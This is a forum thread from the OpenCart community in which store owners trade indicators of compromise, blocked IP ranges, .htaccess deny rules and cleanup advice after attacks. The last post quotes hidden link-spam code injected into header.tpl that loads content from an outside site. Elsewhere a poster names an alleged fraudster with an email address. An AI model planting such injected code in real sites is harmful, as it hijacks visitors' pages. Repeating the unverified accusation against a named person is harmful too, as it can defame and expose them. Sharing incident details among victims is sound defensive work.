OpenCart Community

Some hackers with Vietnam IPs had been going around trying to hack seller's store. Here's some information that might be useful.

Common IPs used by the hackers:

1.55.210.180
1.54.*.*
113.190.139.39
US Proxy Servers

Files to look out for in your system:

system/helper/helper.php
download/ (yourfilenames[dot]random_characters[dot]php_random_characters
modified trojan infected index.html in download folder
download/cp.php

Range of IP recommended to block as they switch between those IPs in Vietnam:

113.22.0.0/16
113.23.0.0/17
113.52.32.0/19
113.61.108.0/22
113.160.0.0/11
1.52.0.0/14

Anyway, the 113.x.x.x range commits a lot of frauds recently.

They also attempts to create an admin user account in the system.

How would one go about blocking these via .htaccess?

This so others can block them if they're not selling in that area.

Thanks for posting btw.

Not to be offensive, but I rarely have Vietnamese buyers. You just deny them through your .htaccess file. Entering the ip address/subnet will block off the whole range correctly.

Just a heads up to anyone else affected;

If they've used the same tool as they have to hack mine, you might also want to clear your /tmp directory as they have placed key files in mine to allow themselves ssh access.

JoseManuel wrote:Watch this topic open.http://forum.opencart.com/viewtopic.php?f=10&t=91623

The IPs and nationality of the attacks seen by me are not real.

I move that topic to the Moderators forum to have it analyzed.

so we have to change admin default username/password

and for developers giving admin access to people to show their mods have to disable access to download tab via admin permission feature

is this all or i am missing something.....

if you main store is linked to the demo sites, change your database password! Check your error logs in OpenCart and cPanel. Deny the listed IPs is recommended. Monitor traffic accessing suspicious files that shouldn't be on your server. Monitor for a week to two consistently. A waste of time, but better be safe.

Another IP to note: 178.238.228.92.

The bad things about these hackers, they always forget to clear their footprints after they are done. And the bad things about us, we always don't take enough precaution. Best practice is to comment out the block of PHP codes that does uploading. Removing the javascript isn't enough. Or just change the folder's permission

i2Paq wrote:How would one go about blocking these via .htaccess?

This so others can block them if they're not selling in that area.

Thanks for posting btw.

order allow,deny
allow from all
deny from 88.131.106.0/24
deny from 180.76.5.0/24 # Baidu Spider
deny from 220.181.108.0/24 # Baidu
deny from 208.83.156.0/24
deny from 113.22.0.0/16
deny from 113.23.0.0/17
deny from 113.52.32.0/19
deny from 113.61.108.0/22
deny from 113.160.0.0/11
deny from 1.52.0.0/14

my website hacked two times in last two weeks, I can not login to admin panel even after the password reset via database phpmyadmin, at before I'm not realized that my website has been hacked until I noticed in user table of database that the IP address is not mine, then when I check the IP location it is from vietnam.
and yesterday I got someone from vietnam trying to steal my product by purchasing it with very low price, the product price is $19.95 but he only pay $0.01 to my paypal, I don't know how he can do it, fortunately the order status is pending so (maybe) he can't download the files.
is there anyone knows which system files that possible to be hacked that causing I can not login to admin?

every one becarefull with this IP :
113.166.96.13
123.21.178.196
93.139.33.141

and becarefull with this name (he register as Andrea Pots but I got his name in paypal payment detail) :
Minh Phuc Duong
paypal address: phucduongqb@zing.vn

if you provided demo sites, check all of them. Check your download folders if they made a backdoor program or some sort. Happy searching ~

I noticed the suspicious file about the time this thread was started. Followed a lot of the good steps laid out in the previous posts and haven't had any issues since.


Cheers,

Joel.

I found someone has injected some code in header.tpl, footer.tpl, content_top.tpl files and maybe in other files, and I found it in (maybe) almost all of my demo theme links, I'm still on process checking the files now.
the code injected/inserted in notification div id in header.tpl file, so theme maker please check also your demo links files, maybe it also happen to you, but I hope not.

here is the code that has been injected:

<style>#getcms,.h1en{width:1px; height:1px; position:absolute; overflow:hidden;}</style>
<h1 class="h1en"><a href="http://cartcms.net" title="Cart CMS - Free Shopping Cart CMS" rel="dofollow">Cart CMS - Free Shopping Cart CSM</a>
<div id="getcms"></div></h1>
<script type="text/javascript"><!--
$(document).ready(function() {
$('#getcms').load('http://cartcms.net');
});
//--></script>